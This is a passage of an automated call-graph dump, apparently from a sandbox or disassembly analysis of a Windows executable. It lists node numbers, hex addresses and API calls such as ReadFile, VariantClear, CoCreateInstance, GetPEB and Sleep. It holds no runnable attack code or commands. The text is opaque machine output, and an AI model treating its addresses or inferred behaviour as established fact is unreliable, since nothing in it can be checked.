41dd28 87576->87586 87580 41dcc9 GetLastError 87577->87580 87588 41dcd3 87577->87588 87578 41ded0 ReadFile 87581 41deef GetLastError 87578->87581 87589 41def9 87578->87589 87579->87575 87579->87578 87580->87576 87580->87588 87581->87579 87581->87589 87582 41ddec MultiByteToWideChar 87582->87575 87583 41de10 GetLastError 87582->87583 87583->87560 87584 41dda3 87591 41dd60 87584->87591 87592 41ddda 87584->87592 87585 41dd96 87587 417f77 __recalloc 46 API calls 87585->87587 87586->87575 87586->87584 87586->87585 87586->87591 87587->87575 87588->87576 87593 420494 __lseeki64_nolock 48 API calls 87588->87593 87589->87579 87590 420494 __lseeki64_nolock 48 API calls 87589->87590 87590->87589 87591->87582 87594 420494 __lseeki64_nolock 48 API calls 87592->87594 87593->87588 87595 41dde9 87594->87595 87595->87582 87596->87480 87597->87492 87598->87481 87599->87488 87600->87492 87601->87491 87602->87488 87603->87500 87604->87499 87605->87492 87607 416b04 __malloc_crt 46 API calls 87606->87607 87608 420618 87607->87608 87608->87509 87609->87506 87610->87515 87614 4148b3 GetSystemTimeAsFileTime __aulldiv 87611->87614 87613 442c6b 87613->87117 87614->87613 87615->87124 87616->87129 87617->87129 87620 45272f __tzset_nolock _wcscpy 87618->87620 87619 4528a4 87619->87039 87619->87040 87620->87619 87621 44afef GetSystemTimeAsFileTime 87620->87621 87622 414d04 61 API calls __fread_nolock 87620->87622 87623 4150d1 81 API calls _fseek 87620->87623 87621->87620 87622->87620 87623->87620 87625 44b1bc 87624->87625 87626 44b1ca 87624->87626 87627 4149c2 116 API calls 87625->87627 87628 44b1e1 87626->87628 87629 4149c2 116 API calls 87626->87629 87630 44b1d8 87626->87630 87627->87626 87659 4321a4 87628->87659 87631 44b2db 87629->87631 87630->87068 87631->87628 87636 44b2e9 87631->87636 87633 44b224 87634 44b253 87633->87634 87635 44b228 87633->87635 87663 43213d 87634->87663 87638 44b235 87635->87638 87641 414a46 __fcloseall 82 API calls 87635->87641 87637 44b2f6 87636->87637 87639 414a46 __fcloseall 82 API calls 87636->87639 87637->87068 87642 44b245 87638->87642 87644 414a46 __fcloseall 82 API calls 87638->87644 87639->87637 87641->87638 87642->87068 87643 44b25a 87645 44b260 87643->87645 87646 44b289 87643->87646 87644->87642 87648 44b26d 87645->87648 87651 414a46 __fcloseall 82 API calls 87645->87651 87673 44b0bf 87 API calls 87646->87673 87649 44b27d 87648->87649 87652 414a46 __fcloseall 82 API calls 87648->87652 87649->87068 87650 44b28f 87674 4320f8 46 API calls _free 87650->87674 87651->87648 87652->87649 87654 44b295 87655 44b2a2 87654->87655 87656 414a46 __fcloseall 82 API calls 87654->87656 87657 44b2b2 87655->87657 87658 414a46 __fcloseall 82 API calls 87655->87658 87656->87655 87657->87068 87658->87657 87660 4321b4 __tzset_nolock _memmove 87659->87660 87661 4321cb 87659->87661 87660->87633 87662 414d04 __fread_nolock 61 API calls 87661->87662 87662->87660 87664 4135bb _malloc 46 API calls 87663->87664 87665 432150 87664->87665 87666 4135bb _malloc 46 API calls 87665->87666 87667 432162 87666->87667 87668 4135bb _malloc 46 API calls 87667->87668 87670 432174 87668->87670 87672 432189 87670->87672 87675 4320f8 46 API calls _free 87670->87675 87671 432198 87671->87643 87672->87643 87673->87650 87674->87654 87675->87671 87676->86968 87677->86971 87678->86989 87679->86989 87680->86989 87681->86980 87682->86989 87683->86989 87684->86993 87685->87002 87686->87004 87687->87004 87737 410160 87688->87737 87690 41012f GetFullPathNameW 87691 410147 ctype 87690->87691 87691->86824 87693 4102cb SHGetDesktopFolder 87692->87693 87696 410333 _wcsncpy 87692->87696 87694 4102e0 _wcsncpy 87693->87694 87693->87696 87695 41031c SHGetPathFromIDListW 87694->87695 87694->87696 87695->87696 87696->86827 87698 4101bb 87697->87698 87703 425f4a 87697->87703 87699 410160 52 API calls 87698->87699 87700 4101c7 87699->87700 87741 410200 52 API calls 2 library calls 87700->87741 87701 4114ab __wcsicoll 58 API calls 87701->87703 87703->87701 87704 425f6e 87703->87704 87704->86829 87705 4101d6 87742 410200 52 API calls 2 library calls 87705->87742 87707 4101e9 87707->86829 87709 40f760 128 API calls 87708->87709 87710 40f584 87709->87710 87711 429335 87710->87711 87712 40f58c 87710->87712 87715 4528bd 118 API calls 87711->87715 87713 40f598 87712->87713 87714 429358 87712->87714 87767 4033c0 113 API calls 7 library calls 87713->87767 87768 434034 86 API calls _wprintf 87714->87768 87718 42934b 87715->87718 87721 429373 87718->87721 87722 42934f 87718->87722 87719 429369 87719->87721 87720 40f5b4 87720->86826 87723 4115d7 52 API calls 87721->87723 87724 431e58 82 API calls 87722->87724 87736 4293c5 ctype 87723->87736 87724->87714 87725 42959c 87726 413748 _free 46 API calls 87725->87726 87727 4295a5 87726->87727 87728 431e58 82 API calls 87727->87728 87729 4295b1 87728->87729 87733 401b10 52 API calls 87733->87736 87736->87725 87736->87733 87743 444af8 87736->87743 87746 44b41c 87736->87746 87753 402780 87736->87753 87761 4022d0 87736->87761 87769 44c7dd 64 API calls 3 library calls 87736->87769 87738 410167 _wcslen 87737->87738 87739 4115d7 52 API calls 87738->87739 87740 41017e _wcscpy 87739->87740 87740->87690 87741->87705 87742->87707 87744 4115d7 52 API calls 87743->87744 87745 444b27 _memmove 87744->87745 87745->87736 87748 44b429 87746->87748 87747 4115d7 52 API calls 87749 44b440 87747->87749 87748->87747 87750 44b45e 87749->87750 87751 401b10 52 API calls 87749->87751 87750->87736 87752 44b453 87751->87752 87752->87736 87754 402790 ctype _memmove 87753->87754 87755 402827 87753->87755 87756 4115d7 52 API calls 87754->87756 87757 4115d7 52 API calls 87755->87757 87758 402797 87756->87758 87757->87754 87759 4027bd 87758->87759 87760 4115d7 52 API calls 87758->87760 87759->87736 87760->87759 87762 4022e0 87761->87762 87764 40239d 87761->87764 87763 4115d7 52 API calls 87762->87763 87762->87764 87766 402320 ctype 87762->87766 87763->87766 87764->87736 87765 4115d7 52 API calls 87765->87766 87766->87764 87766->87765 87767->87720 87768->87719 87769->87736 87771 402417 87770->87771 87775 402539 ctype 87770->87775 87772 4115d7 52 API calls 87771->87772 87771->87775 87773 402443 87772->87773 87774 4115d7 52 API calls 87773->87774 87776 4024b4 87774->87776 87775->86833 87776->87775 87776->87776 87778 4022d0 52 API calls 87776->87778 87799 402880 87776->87799 87778->87776 87783 401566 87779->87783 87780 401794 87850 40e9a0 90 API calls 87780->87850 87782 40167a 87786 4017c0 87782->87786 87851 45e737 90 API calls 3 library calls 87782->87851 87783->87780 87783->87782 87785 4010a0 52 API calls 87783->87785 87785->87783 87786->86835 87788 40bc70 52 API calls 87787->87788 87797 40d451 87788->87797 87789 40d50f 87855 410600 52 API calls 87789->87855 87791 427c01 87856 45e737 90 API calls 3 library calls 87791->87856 87794 401b10 52 API calls 87794->87797 87795 40d519 87795->86838 87797->87789 87797->87791 87797->87794 87797->87795 87852 40e0a0 52 API calls 87797->87852 87853 40f310 53 API calls 87797->87853 87854 40d860 91 API calls 87797->87854 87800 4115d7 52 API calls 87799->87800 87801 4028b3 87800->87801 87802 4115d7 52 API calls 87801->87802 87839 4028c5 ctype _memmove 87802->87839 87803 402780 52 API calls 87838 402b1e ctype 87803->87838 87804 427d62 87808 403350 52 API calls 87804->87808 87806 402bb6 87842 403060 53 API calls 87806->87842 87807 402aeb ctype 87807->87803 87812 42802b ctype 87807->87812 87816 427d6b 87808->87816 87810 402780 52 API calls 87810->87839 87811 402bca 87813 427f63 87811->87813 87814 402bd4 87811->87814 87847 460879 92 API calls 3 library calls 87813->87847 87818 402780 52 API calls 87814->87818 87815 403350 52 API calls 87815->87839 87822 427f2c 87816->87822 87845 403020 52 API calls _memmove 87816->87845 87820 402bdf 87818->87820 87820->87776 87821 427fd5 87848 460879 92 API calls 3 library calls 87821->87848 87846 460879 92 API calls 3 library calls 87822->87846 87826 427fa5 87833 402780 52 API calls 87826->87833 87827 402f00 52 API calls 87827->87839 87828 4013a0 52 API calls 87828->87839 87829 427fe4 87837 402780 52 API calls 87829->87837 87830 428000 87849 460879 92 API calls 3 library calls 87830->87849 87831 4026f0 52 API calls 87836 402a85 CharUpperBuffW 87831->87836 87833->87838 87835 427f48 87835->87838 87836->87839 87837->87835 87838->87776 87839->87804 87839->87806 87839->87807 87839->87810 87839->87815 87839->87821 87839->87822 87839->87826 87839->87827 87839->87828 87839->87830 87839->87831 87840 4115d7 52 API calls 87839->87840 87841 4031b0 63 API calls 87839->87841 87843 402f80 92 API calls _memmove 87839->87843 87844 402280 52 API calls 87839->87844 87840->87839 87841->87839 87842->87811 87843->87839 87844->87839 87845->87816 87846->87835 87847->87835 87848->87829 87849->87838 87850->87782 87851->87786 87852->87797 87853->87797 87854->87797 87855->87795 87856->87795 87857->86851 87858->86852 87860 42c5fe 87859->87860 87875 4091c6 87859->87875 87861 40bc70 52 API calls 87860->87861 87860->87875 87862 42c64e InterlockedIncrement 87861->87862 87863 42c665 87862->87863 87868 42c697 87862->87868 87865 42c672 InterlockedDecrement Sleep InterlockedIncrement 87863->87865 87863->87868 87864 42c737 InterlockedDecrement 87866 42c74a 87864->87866 87865->87863 87865->87868 87869 408f40 VariantClear 87866->87869 87867 42c731 87867->87864 87868->87864 87868->87867 88144 408e80 87868->88144 87871 42c752 87869->87871 88157 410c60 87871->88157 87872 42c6cf 88148 45340c 87872->88148 87875->86913 87876 42c6db 87877 402160 52 API calls 87876->87877 87878 42c6e5 87877->87878 87879 45340c 85 API calls 87878->87879 87880 42c6f1 87879->87880 88154 40d200 52 API calls 2 library calls 87880->88154 87882 42c6fb 88155 465124 53 API calls 87882->88155 87884 42c715 87885 42c76a 87884->87885 87886 42c719 87884->87886 87887 401b10 52 API calls 87885->87887 88156 46fe32 VariantClear 87886->88156 87889 42c77e 87887->87889 87890 401980 53 API calls 87889->87890 87896 42c796 87890->87896 87891 42c812 88163 46fe32 VariantClear 87891->88163 87893 42c82a InterlockedDecrement 88164 46ff07 54 API calls 87893->88164 87895 42c864 88165 45e737 90 API calls 3 library calls 87895->88165 87896->87891 87896->87895 88162 40ba10 52 API calls 2 library calls 87896->88162 87898 42c9ec 87904 42c874 87907 408f40 VariantClear 87904->87907 87916 42ca59 87904->87916 87905 408f40 VariantClear 87908 42c849 87905->87908 87911 42c891 87907->87911 87908->87898 87908->87905 87909 402780 52 API calls 87908->87909 87914 401980 53 API calls 87908->87914 88166 40a780 87908->88166 87909->87908 87913 410c60 VariantClear 87911->87913 87913->87875 87914->87908 87916->87916 87918 40afc4 87917->87918 87919 40b156 87917->87919 87920 40afd5 87918->87920 87921 42d1e3 87918->87921 88222 45e737 90 API calls 3 library calls 87919->88222 87924 40a780 204 API calls 87920->87924 87942 40b11a ctype 87920->87942 88223 45e737 90 API calls 3 library calls 87921->88223 87927 40b00a 87924->87927 87925 40b143 87925->86913 87926 42d1f8 87930 408f40 VariantClear 87926->87930 87927->87926 87931 40b012 87927->87931 87929 42d4db 87929->87929 87930->87925 87932 40b04a 87931->87932 87934 42d231 VariantClear 87931->87934 87935 40b094 ctype 87931->87935 87940 40b05c ctype 87932->87940 88224 40e270 VariantClear ctype 87932->88224 87933 40b108 87933->87942 88225 40e270 VariantClear ctype 87933->88225 87934->87940 87935->87933 87937 42d425 ctype 87935->87937 87936 42d45a VariantClear 87936->87942 87937->87936 87937->87942 87940->87935 87941 4115d7 52 API calls 87940->87941 87941->87935 87942->87925 88226 45e737 90 API calls 3 library calls 87942->88226 87944 408fff 87943->87944 87956 40900d 87943->87956 88273 403ea0 52 API calls __cinit 87944->88273 87947 42c3f6 88276 45e737 90 API calls 3 library calls 87947->88276 87949 40a780 204 API calls 87949->87956 87950 42c44a 88278 45e737 90 API calls 3 library calls 87950->88278 87952 42c47b 88279 451b42 61 API calls 87952->88279 87954 42c4cb 88227 47faae 87954->88227 87955 42c564 87960 408f40 VariantClear 87955->87960 87956->87947 87956->87949 87956->87950 87956->87952 87956->87954 87956->87955 87959 42c548 87956->87959 87963 409112 87956->87963 87964 4090f2 ctype 87956->87964 87966 4090df 87956->87966 87968 42c528 87956->87968 87971 4090ea 87956->87971 88275 4534e3 52 API calls 87956->88275 88277 40c4e0 204 API calls 87956->88277 88283 45e737 90 API calls 3 library calls 87959->88283 87960->87964 87961 42c491 87961->87964 88280 45e737 90 API calls 3 library calls 87961->88280 87962 42c4da 87962->87964 88281 45e737 90 API calls 3 library calls 87962->88281 87963->87959 87969 40912b 87963->87969 87964->86913 87966->87971 87972 408e80 VariantClear 87966->87972 88282 45e737 90 API calls 3 library calls 87968->88282 87969->87964 88274 403e10 53 API calls 87969->88274 87974 408f40 VariantClear 87971->87974 87972->87971 87974->87964 87976 40914b 87977 408f40 VariantClear 87976->87977 87977->87964 88472 408d90 87978->88472 87980 429778 87981 410c60 VariantClear 87980->87981 87982 429780 87981->87982 87983 408cf9 87983->87980 87984 42976c 87983->87984 87986 408d2d 87983->87986 88499 45e737 90 API calls 3 library calls 87984->88499 88488 403d10 87986->88488 87989 408d71 ctype 87989->86913 87990 408f40 VariantClear 87991 408d45 ctype 87990->87991 87991->87989 87991->87990 87993 4096c6 _wcslen 87992->87993 87994 40a70c ctype _memmove 87993->87994 87995 4115d7 52 API calls 87993->87995 87998 4013a0 52 API calls 87994->87998 87996 4096fa _memmove 87995->87996 87997 4115d7 52 API calls 87996->87997 87999 40971b 87997->87999 88000 4297aa 87998->88000 87999->87994 88002 409749 CharUpperBuffW 87999->88002 88005 40976a ctype 87999->88005 88001 4115d7 52 API calls 88000->88001 88004 4297d1 _memmove 88001->88004 88002->88005 88746 45e737 90 API calls 3 library calls 88004->88746 88017 4097e5 ctype 88005->88017 88721 47dcbb 206 API calls 88005->88721 88007 408f40 VariantClear 88008 42ae92 88007->88008 88009 410c60 VariantClear 88008->88009 88010 42aea4 88009->88010 88011 409aa2 88011->88004 88013 4115d7 52 API calls 88011->88013 88016 409afe 88011->88016 88012 40a689 88014 4115d7 52 API calls 88012->88014 88013->88016 88032 40a6af ctype _memmove 88014->88032 88015 40c2c0 52 API calls 88015->88017 88018 409b2a 88016->88018 88019 4115d7 52 API calls 88016->88019 88017->88004 88017->88011 88017->88012 88017->88015 88025 429a46 VariantClear 88017->88025 88030 408f40 VariantClear 88017->88030 88017->88032 88036 4115d7 52 API calls 88017->88036 88045 4299d9 88017->88045 88049 429abd 88017->88049 88057 40a780 204 API calls 88017->88057 88063 42a452 88017->88063 88722 40c4e0 204 API calls 88017->88722 88723 40ba10 52 API calls 2 library calls 88017->88723 88724 40e270 VariantClear ctype 88017->88724 88020 429dbe 88018->88020 88086 409b4d ctype _memmove 88018->88086 88729 40b400 VariantClear VariantClear ctype 88018->88729 88021 429d31 88019->88021 88024 429dd3 88020->88024 88730 40b400 VariantClear VariantClear ctype 88020->88730 88023 429d42 88021->88023 88725 44a801 52 API calls 88021->88725 88726 40e0a0 52 API calls 88023->88726 88040 40e1c0 VariantClear 88024->88040 88024->88086 88025->88017 88028 40a045 88034 4115d7 52 API calls 88028->88034 88029 42a3f5 88733 47390f VariantClear 88029->88733 88030->88017 88041 4115d7 52 API calls 88032->88041 88042 40a04c 88034->88042 88036->88017 88039 42a42f 88734 45e737 90 API calls 3 library calls 88039->88734 88040->88086 88041->87994 88044 40a0a7 88042->88044 88047 4091e0 321 API calls 88042->88047 88043 429d57 88727 453443 52 API calls 88043->88727 88065 40a0af 88044->88065 88735 40c790 VariantClear ctype 88044->88735 88048 408f40 VariantClear 88045->88048 88047->88044 88053 4299e2 88048->88053 88049->86913 88050 429d88 88728 453443 52 API calls 88050->88728 88061 410c60 VariantClear 88053->88061 88057->88017 88058 402780 52 API calls 88058->88086 88059 4115d7 52 API calls 88059->88086 88060 44a801 52 API calls 88060->88086 88115 40a650 ctype 88061->88115 88062 408f40 VariantClear 88092 40a162 ctype _memmove 88062->88092 88063->88007 88064 41130a 51 API calls __cinit 88064->88086 88066 40a11b 88065->88066 88068 42a4b4 VariantClear 88065->88068 88065->88092 88073 40a12d ctype 88066->88073 88736 40e270 VariantClear ctype 88066->88736 88067 40a780 204 API calls 88067->88086 88068->88073 88070 401980 53 API calls 88070->88086 88071 408e80 VariantClear 88071->88086 88072 4115d7 52 API calls 88072->88092 88073->88072 88073->88092 88074 408e80 VariantClear 88074->88092 88076 42a74d VariantClear 88076->88092 88077 40a368 88078 42aad4 88077->88078 88087 40a397 88077->88087 88739 46fe90 VariantClear VariantClear ctype 88078->88739 88079 409fd2 88079->88028 88079->88029 88080 42a7e4 VariantClear 88080->88092 88081 42a886 VariantClear 88081->88092 88083 409c95 88083->86913 88084 40a3ce 88100 40a3d9 ctype 88084->88100 88740 40b400 VariantClear VariantClear ctype 88084->88740 88085 40e270 VariantClear 88085->88092 88086->87994 88086->88029 88086->88039 88086->88058 88086->88059 88086->88060 88086->88064 88086->88067 88086->88070 88086->88071 88086->88079 88086->88083 88731 45f508 52 API calls 88086->88731 88732 403e10 53 API calls 88086->88732 88087->88084 88112 40a42c ctype 88087->88112 88720 40b400 VariantClear VariantClear ctype 88087->88720 88090 42abaf 88096 42abd4 VariantClear 88090->88096 88105 40a4ee ctype 88090->88105 88091 4115d7 52 API calls 88091->88092 88092->88062 88092->88074 88092->88076 88092->88077 88092->88078 88092->88080 88092->88081 88092->88085 88092->88091 88094 4115d7 52 API calls 88092->88094 88737 470870 52 API calls 88092->88737 88738 44ccf1 VariantClear ctype 88092->88738 88093 40a4dc 88093->88105 88742 40e270 VariantClear ctype 88093->88742 88095 42a5a6 VariantInit VariantCopy 88094->88095 88095->88092 88097 42a5c6 VariantClear 88095->88097 88096->88105 88097->88092 88098 42ac4f 88106 42ac79 VariantClear 88098->88106 88110 40a546 ctype 88098->88110 88101 40a41a 88100->88101 88103 42ab44 VariantClear 88100->88103 88100->88112 88101->88112 88741 40e270 VariantClear ctype 88101->88741 88102 40a534 88102->88110 88743 40e270 VariantClear ctype 88102->88743 88103->88112 88105->88098 88105->88102 88106->88110 88107 42ad28 88113 42ad4e VariantClear 88107->88113 88118 40a583 ctype 88107->88118 88110->88107 88111 40a571 88110->88111 88111->88118 88744 40e270 VariantClear ctype 88111->88744 88112->88090 88112->88093 88113->88118 88115->86913 88116 42ae0e VariantClear 88116->88118 88118->88115 88118->88116 88745 40e270 VariantClear ctype 88118->88745 88119->86913 88120->86913 88121->86913 88122->86862 88123->86867 88124->86913 88125->86913 88126->86913 88127->86913 88128->86913 88129->86918 88130->86918 88131->86918 88132->86918 88133->86918 88134->86918 88135->86918 88137 403cdf 88136->88137 88138 408f40 VariantClear 88137->88138 88139 403ce7 88138->88139 88139->86907 88140->86918 88141->86918 88142->86913 88143->86859 88145 408e88 88144->88145 88147 408e94 88144->88147 88146 408f40 VariantClear 88145->88146 88146->88147 88147->87872 88147->88147 88149 453439 88148->88149 88150 453419 88148->88150 88149->87876 88151 45342f 88150->88151 88209 4531b1 85 API calls 5 library calls 88150->88209 88151->87876 88153 453425 88153->87876 88154->87882 88155->87884 88156->87867 88158 428372 88157->88158 88159 410c73 ctype 88157->88159 88161 42838c 88158->88161 88210 40e1c0 88158->88210 88159->87875 88162->87896 88163->87893 88164->87908 88165->87904 88167 40a7a6 88166->88167 88168 40ae8c 88166->88168 88209->88153 88211 408f40 VariantClear 88210->88211 88212 40e1cb ctype 88211->88212 88212->88158 88222->87921 88223->87926 88224->87940 88225->87942 88226->87929 88228 408e80 VariantClear 88227->88228 88231 47fb02 88228->88231 88232 47fc59 88231->88232 88246 47fc2b 88231->88246 88250 47fcd4 88231->88250 88253 408e80 VariantClear 88231->88253 88259 408f40 VariantClear 88231->88259 88269 47fc1d 88231->88269 88284 475a67 88231->88284 88312 47b291 88231->88312 88323 46fe32 VariantClear 88231->88323 88233 40a780 204 API calls 88232->88233 88235 47fc6a 88233->88235 88239 47fc7d 88235->88239 88240 47fc8c 88235->88240 88235->88246 88236 408f40 VariantClear 88237 47fc33 88236->88237 88238 408f40 VariantClear 88237->88238 88241 47fc3b 88238->88241 88325 45e737 90 API calls 3 library calls 88239->88325 88326 40ba10 52 API calls 2 library calls 88240->88326 88245 408f40 VariantClear 88241->88245 88244 47fc98 88327 47b2f4 144 API calls 88244->88327 88248 47fc43 88245->88248 88246->88236 88251 410c60 VariantClear 88248->88251 88249 47fca7 88252 408f40 VariantClear 88249->88252 88255 408f40 VariantClear 88250->88255 88254 47fc4b 88251->88254 88256 47fcb1 88252->88256 88253->88231 88254->87962 88257 47fcdc 88255->88257 88258 408f40 VariantClear 88256->88258 88260 408f40 VariantClear 88257->88260 88261 47fcb9 88258->88261 88259->88231 88262 47fce4 88260->88262 88264 408f40 VariantClear 88261->88264 88263 408f40 VariantClear 88262->88263 88265 47fcec 88263->88265 88266 47fcc1 88264->88266 88267 410c60 VariantClear 88265->88267 88268 410c60 VariantClear 88266->88268 88270 47fcf4 88267->88270 88271 47fcc9 88268->88271 88324 45e538 90 API calls 3 library calls 88269->88324 88270->87962 88271->87962 88273->87956 88274->87976 88275->87956 88276->87964 88277->87956 88278->87964 88279->87961 88280->87964 88281->87964 88282->87964 88283->87955 88285 475ae5 88284->88285 88288 475ac5 88284->88288 88328 45e737 90 API calls 3 library calls 88285->88328 88287 475afe 88289 408f40 VariantClear 88287->88289 88288->88285 88290 475b42 88288->88290 88291 402780 52 API calls 88288->88291 88293 475b06 88289->88293 88292 402780 52 API calls 88290->88292 88291->88288 88302 475b60 88292->88302 88293->88231 88294 475c7c 88295 408f40 VariantClear 88294->88295 88299 475c84 88295->88299 88296 40c2c0 52 API calls 88296->88302 88297 40a780 204 API calls 88297->88302 88298 475cc7 88301 408f40 VariantClear 88298->88301 88299->88231 88305 475ca8 88301->88305 88302->88294 88302->88296 88302->88297 88302->88298 88303 475cd5 88302->88303 88304 408f40 VariantClear 88302->88304 88309 475ca0 88302->88309 88329 40c4e0 204 API calls 88302->88329 88330 40ba10 52 API calls 2 library calls 88302->88330 88331 45e737 90 API calls 3 library calls 88303->88331 88304->88302 88305->88231 88308 475ce8 88310 408f40 VariantClear 88308->88310 88311 408f40 VariantClear 88309->88311 88310->88305 88311->88305 88313 47b2e7 88312->88313 88314 47b2a5 88312->88314 88313->88231 88332 40e710 88314->88332 88317 47b2b7 88343 47974b 88317->88343 88318 47b2cf 88320 47974b 144 API calls 88318->88320 88322 47b2df 88320->88322 88321 47b2c7 88321->88231 88322->88231 88323->88231 88324->88246 88325->88246 88326->88244 88327->88249 88328->88287 88329->88302 88330->88302 88331->88308 88333 408f40 VariantClear 88332->88333 88334 40e71b 88333->88334 88335 4115d7 52 API calls 88334->88335 88336 40e729 88335->88336 88337 40e734 88336->88337 88338 426bdc 88336->88338 88339 426be7 88337->88339 88341 401b10 52 API calls 88337->88341 88338->88339 88340 40bc70 52 API calls 88338->88340 88340->88339 88342 40e743 88341->88342 88342->88317 88342->88318 88344 479786 88343->88344 88345 479aed 88343->88345 88344->88345 88347 479798 88344->88347 88412 451b42 61 API calls 88345->88412 88349 4797a2 88347->88349 88350 4797be 88347->88350 88348 479b00 88348->88321 88405 451b42 61 API calls 88349->88405 88352 4797c7 88350->88352 88353 4797e3 88350->88353 88406 451b42 61 API calls 88352->88406 88383 441eba 88353->88383 88355 4797b5 88355->88321 88357 4797f7 88359 479815 88357->88359 88360 4797fe 88357->88360 88358 4797da 88358->88321 88364 47983c 88359->88364 88388 451d2b 88359->88388 88407 451b42 61 API calls 88360->88407 88362 47980c 88362->88321 88369 4798e6 88364->88369 88399 479714 88364->88399 88365 47994b VariantInit 88372 479980 __recalloc 88365->88372 88368 479916 VariantClear 88368->88369 88369->88365 88369->88368 88384 441f12 88383->88384 88385 441ecc _wcslen 88383->88385 88384->88357 88385->88384 88386 410160 52 API calls 88385->88386 88387 441ede 88386->88387 88387->88357 88389 451d5e 88388->88389 88390 451e93 SysFreeString 88389->88390 88391 451f21 88389->88391 88393 451d68 88389->88393 88394 451ea0 88389->88394 88390->88394 88392 451fab 88391->88392 88391->88394 88395 451f6d lstrcmpiW 88391->88395 88396 451f7f SysFreeString 88391->88396 88392->88364 88393->88364 88394->88393 88413 44a545 RaiseException 88394->88413 88395->88396 88398 451fc7 SysFreeString 88395->88398 88396->88391 88398->88394 88400 479728 88399->88400 88414 479500 VariantInit 88400->88414 88405->88355 88406->88358 88407->88362 88412->88348 88413->88394 88473 4289d2 88472->88473 88474 408db3 88472->88474 88502 45e737 90 API calls 3 library calls 88473->88502 88500 40bec0 90 API calls 88474->88500 88477 4289e5 88503 45e737 90 API calls 3 library calls 88477->88503 88480 428a05 88481 408f40 VariantClear 88480->88481 88487 408e5a 88481->88487 88482 40a780 204 API calls 88485 408dc9 88482->88485 88483 408e64 88484 408f40 VariantClear 88483->88484 88484->88487 88485->88477 88485->88480 88485->88482 88485->88483 88486 408f40 VariantClear 88485->88486 88485->88487 88501 40ba10 52 API calls 2 library calls 88485->88501 88486->88485 88487->87983 88489 408f40 VariantClear 88488->88489 88490 403d20 88489->88490 88491 403cd0 VariantClear 88490->88491 88492 403d4d 88491->88492 88494 4013c0 52 API calls 88492->88494 88504 477145 88492->88504 88509 4755ad 88492->88509 88512 4813fa 88492->88512 88522 46f8cb 88492->88522 88493 403d76 88493->87980 88493->87991 88494->88493 88499->87980 88500->88485 88501->88485 88502->88477 88503->88480 88505 408e80 VariantClear 88504->88505 88506 47715a 88505->88506 88541 467ac4 88506->88541 88508 477160 88508->88493 88564 475077 88509->88564 88511 4755c0 88511->88493 88513 45340c 85 API calls 88512->88513 88514 481438 88513->88514 88515 402880 95 API calls 88514->88515 88516 48143f 88515->88516 88517 481465 88516->88517 88518 40a780 204 API calls 88516->88518 88519 40e710 53 API calls 88517->88519 88521 481469 88517->88521 88518->88517 88520 4814a4 88519->88520 88520->88493 88521->88493 88523 46f8e7 88522->88523 88524 46f978 88522->88524 88525 46f900 88523->88525 88526 46f93c 88523->88526 88527 46f91a 88523->88527 88528 46f8ee 88523->88528 88524->88493 88529 45340c 85 API calls 88525->88529 88531 45340c 85 API calls 88526->88531 88530 45340c 85 API calls 88527->88530 88532 45340c 85 API calls 88528->88532 88529->88528 88533 46f931 88530->88533 88534 46f958 88531->88534 88535 46f971 88532->88535 88536 45340c 85 API calls 88533->88536 88537 45340c 85 API calls 88534->88537 88668 46cb5f 88535->88668 88536->88528 88539 46f95f 88537->88539 88540 45340c 85 API calls 88539->88540 88540->88528 88542 467adc 88541->88542 88552 467bb8 88541->88552 88543 467c1d 88542->88543 88544 467c16 88542->88544 88545 467b90 88542->88545 88554 467aed 88542->88554 88547 4115d7 52 API calls 88543->88547 88563 40e270 VariantClear ctype 88544->88563 88548 4115d7 52 API calls 88545->88548 88549 467b75 _memmove 88547->88549 88548->88549 88551 4115d7 52 API calls 88549->88551 88550 467b55 88553 4115d7 52 API calls 88550->88553 88551->88552 88552->88508 88555 467b5b 88553->88555 88556 4115d7 52 API calls 88554->88556 88560 467b28 ctype 88554->88560 88561 442ee0 52 API calls 88555->88561 88556->88560 88558 467b6b 88562 45f645 54 API calls ctype 88558->88562 88560->88543 88560->88549 88560->88550 88561->88558 88562->88549 88563->88543 88615 4533eb 88564->88615 88567 4750ee 88570 408f40 VariantClear 88567->88570 88568 475129 88619 4646e0 88568->88619 88575 4750f5 88570->88575 88571 47515e 88572 475162 88571->88572 88609 47518e 88571->88609 88573 408f40 VariantClear 88572->88573 88604 475169 88573->88604 88574 475357 88576 475365 88574->88576 88577 4754ea 88574->88577 88575->88511 88653 44b3ac 57 API calls 88576->88653 88659 464812 91 API calls 88577->88659 88583 4533eb 85 API calls 88583->88609 88592 475480 88594 408f40 VariantClear 88592->88594 88594->88604 88602 4754b5 88603 408f40 VariantClear 88602->88603 88603->88604 88604->88511 88609->88574 88609->88583 88609->88592 88609->88602 88609->88609 88651 436299 52 API calls 2 library calls 88609->88651 88652 463ad5 64 API calls __wcsicoll 88609->88652 88616 453404 88615->88616 88617 4533f8 88615->88617 88616->88567 88616->88568 88617->88616 88662 4531b1 85 API calls 5 library calls 88617->88662 88663 4536f7 53 API calls 88619->88663 88621 4646fc 88664 4426cd 59 API calls _wcslen 88621->88664 88623 464711 88625 40bc70 52 API calls 88623->88625 88631 46474b 88623->88631 88626 46472c 88625->88626 88665 461465 52 API calls _memmove 88626->88665 88628 464741 88629 40c600 52 API calls 88628->88629 88629->88631 88630 464793 88630->88571 88631->88630 88666 463ad5 64 API calls __wcsicoll 88631->88666 88651->88609 88652->88609 88662->88616 88663->88621 88664->88623 88665->88628 88666->88630 88669 40bc70 52 API calls 88668->88669 88670 46cb7e 88669->88670 88671 40bc70 52 API calls 88670->88671 88672 46cb86 88671->88672 88673 40bc70 52 API calls 88672->88673 88674 46cb91 88673->88674 88675 408f40 VariantClear 88674->88675 88676 46cbaf 88675->88676 88677 46cbd4 CLSIDFromProgID 88676->88677 88678 46cbc5 OleInitialize 88676->88678 88679 46cc33 88677->88679 88680 46cbe9 CLSIDFromString 88677->88680 88678->88677 88681 46cca6 88679->88681 88682 46cc49 CoCreateInstance 88679->88682 88680->88679 88683 46cbfb 88680->88683 88713 458651 59 API calls __recalloc 88681->88713 88682->88683 88720->88084 88721->88005 88722->88017 88723->88017 88724->88017 88725->88023 88726->88043 88727->88050 88728->88018 88729->88020 88730->88024 88731->88086 88732->88086 88733->88039 88734->88063 88735->88044 88736->88073 88737->88092 88738->88092 88739->88084 88740->88100 88741->88112 88742->88105 88743->88110 88744->88118 88745->88118 88746->88063 88747 406bff0 88761 4069c40 88747->88761 88749 406c072 88764 406bee0 88749->88764 88763 406a2cb 88761->88763 88767 406d0a0 GetPEB 88761->88767 88763->88749 88765 406bee9 Sleep 88764->88765 88766 406bef7 88765->88766 88767->88763 88768 42b14b 88775 40bc10 88768->88775 88770 42b159 88771 4096a0 335 API calls 88770->88771 88772 